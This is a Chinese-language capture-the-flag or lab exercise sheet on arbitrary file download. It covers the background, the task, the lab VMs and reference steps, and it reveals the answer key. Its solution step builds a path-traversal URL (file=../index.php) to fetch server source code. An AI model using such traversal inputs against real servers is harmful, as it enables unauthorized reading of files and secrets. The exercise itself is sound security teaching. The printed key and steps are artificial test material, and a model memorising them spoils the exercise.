目录
1:题目背景
Web 下载功能很大部分是通过一个脚本打开文件,将内容传输给用户。这个过程中如果路径可控,可实现任意文件下载。
2:题目描述
一个web系统中只提供一个下载功能,并且知道index.php文件中存在一串通过的key,得到index.hp文件来通过吧。
3:答案提交
1、提交得到的key。
2、请提交操作过程报告,报告中要包含操作的关键过程描述并附截图,以WORD方式提交。
4: 提交key
key: keep going
5: 关卡环境
VPC1(虚拟PC) | 工具场景:Windows XP操作系统/BT5 |
VPC2(虚拟PC) | Window server xp |
软件描述 | 使用工具场景集成的工具软件,参赛者也可以上传工具软件软件到工具场景。 |
关卡环境描述 | 1、学生机与实验室网络直连 2、VPC与实验室网络直连 3、学生机与VPC物理链路连通 |
6:参考步骤
1.打开浏览器,访问http://192.168.102.62。
2.文件可正常下载,访问http://192.168.102.62/images/Desert.jpg 可得到相同的图片。
3.查看此文件下载地址为:
http://192.168.102.62/index.php?file=Desert.jpg
构造新地址:http://192.168.102.62/index.php?file=../index.php
下载得到index.php文件,打开得到key: keep going